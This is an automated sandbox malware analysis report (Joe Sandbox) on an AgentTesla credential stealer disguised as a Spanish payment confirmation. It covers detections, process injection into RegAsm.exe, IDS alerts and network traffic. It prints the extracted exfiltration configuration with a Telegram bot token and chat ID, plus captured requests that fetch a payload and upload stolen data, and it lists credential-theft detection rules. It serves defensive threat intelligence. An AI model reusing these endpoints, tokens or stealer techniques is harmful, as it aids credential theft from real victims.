Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Confirmaci#U00f3n de pago_shrunk.exe

Overview

General Information

Sample name:Confirmaci#U00f3n de pago_shrunk.exe
renamed because original name is a hash value
Original sample name:Confirmacin de pago_shrunk.exe
Analysis ID:1518505
MD5:5f249a857aa4ec0d7811cbe49b1eac0e
SHA1:9bc2fed4cf1f677c009ba9c0c224e15a07ee8dd4
SHA256:e97a53902ccc623ff61147e3b7cb7e9abf77e8a61a401a317891ffaf73a7338a
Tags:exeuser-malrpt
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Confirmaci#U00f3n de pago_shrunk.exe (PID: 3020 cmdline: "C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe" MD5: 5F249A857AA4EC0D7811CBE49B1EAC0E)
    • RegAsm.exe (PID: 3780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendMessage?chat_id=-4169421237"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2696679944.000000000313E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 12 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.RegAsm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                2.2.RegAsm.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  2.2.RegAsm.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    2.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x33340:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x333b2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3343c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x334ce:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x33538:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x335aa:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x33640:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x336d0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 23 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-25T18:51:27.695363+020028517791Malware Command and Control Activity Detected192.168.2.849705149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-25T18:51:27.695363+020028528151Malware Command and Control Activity Detected192.168.2.849705149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-25T18:51:27.696072+020028542811A Network Trojan was detected149.154.167.220443192.168.2.849705TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: Confirmaci#U00f3n de pago_shrunk.exeAvira: detected
                      Found malware configuration
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendMessage?chat_id=-4169421237"}
                      Source: RegAsm.exe.3780.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendMessage"}
                      Multi AV Scanner detection for submitted file
                      Source: Confirmaci#U00f3n de pago_shrunk.exeReversingLabs: Detection: 39%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: Confirmaci#U00f3n de pago_shrunk.exeJoe Sandbox ML: detected
                      Source: Confirmaci#U00f3n de pago_shrunk.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.8:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49705 version: TLS 1.2
                      Source: Confirmaci#U00f3n de pago_shrunk.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: CVNXGJKDF133.pdb source: Confirmaci#U00f3n de pago_shrunk.exe

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.8:49705 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49705 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.8:49705
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /cCoB5/anonymous.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcdd60c3a34f3cHost: api.telegram.orgContent-Length: 919Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /cCoB5/anonymous.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: transfer.adttemp.com.br
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcdd60c3a34f3cHost: api.telegram.orgContent-Length: 919Expect: 100-continueConnection: Keep-Alive
                      Source: RegAsm.exe, 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2696679944.0000000003146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000003003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.adttemp.com.br
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000003003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.adttemp.com.brd
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: RegAsm.exe, 00000002.00000002.2696679944.0000000003146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/
                      Source: RegAsm.exe, 00000002.00000002.2696679944.0000000003142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.adttemp.com.br
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.adttemp.com.br/cCoB5/anonymous.txt
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.8:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49705 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, n00.cs.Net Code: euczAUZox
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, n00.cs.Net Code: euczAUZox
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, n00.cs.Net Code: euczAUZox

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeCode function: 0_2_02D68EB80_2_02D68EB8
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeCode function: 0_2_02D612520_2_02D61252
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeCode function: 0_2_02D612600_2_02D61260
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeCode function: 0_2_02D615B00_2_02D615B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D93402_2_030D9340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D4A502_2_030D4A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D9AF02_2_030D9AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D3E382_2_030D3E38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DCEA02_2_030DCEA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D41802_2_030D4180
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460095411.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Confirmaci#U00f3n de pago_shrunk.exe
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000000.1436251809.0000000000B16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCVNXGJKDF133.exe: vs Confirmaci#U00f3n de pago_shrunk.exe
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename44e07c50-4c06-45cd-abce-a918ae461de5.exe4 vs Confirmaci#U00f3n de pago_shrunk.exe
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.00000000030F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename44e07c50-4c06-45cd-abce-a918ae461de5.exe4 vs Confirmaci#U00f3n de pago_shrunk.exe
                      Source: Confirmaci#U00f3n de pago_shrunk.exeBinary or memory string: OriginalFilenameCVNXGJKDF133.exe: vs Confirmaci#U00f3n de pago_shrunk.exe
                      Source: Confirmaci#U00f3n de pago_shrunk.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, buR3AKMBuXsg5ovOyf.csCryptographic APIs: 'CreateDecryptor'
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.csCryptographic APIs: 'CreateDecryptor'
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.csCryptographic APIs: 'CreateDecryptor'
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@2/2
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Confirmaci#U00f3n de pago_shrunk.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                      Source: Confirmaci#U00f3n de pago_shrunk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Confirmaci#U00f3n de pago_shrunk.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Confirmaci#U00f3n de pago_shrunk.exeReversingLabs: Detection: 39%
                      Source: unknownProcess created: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe "C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe"
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
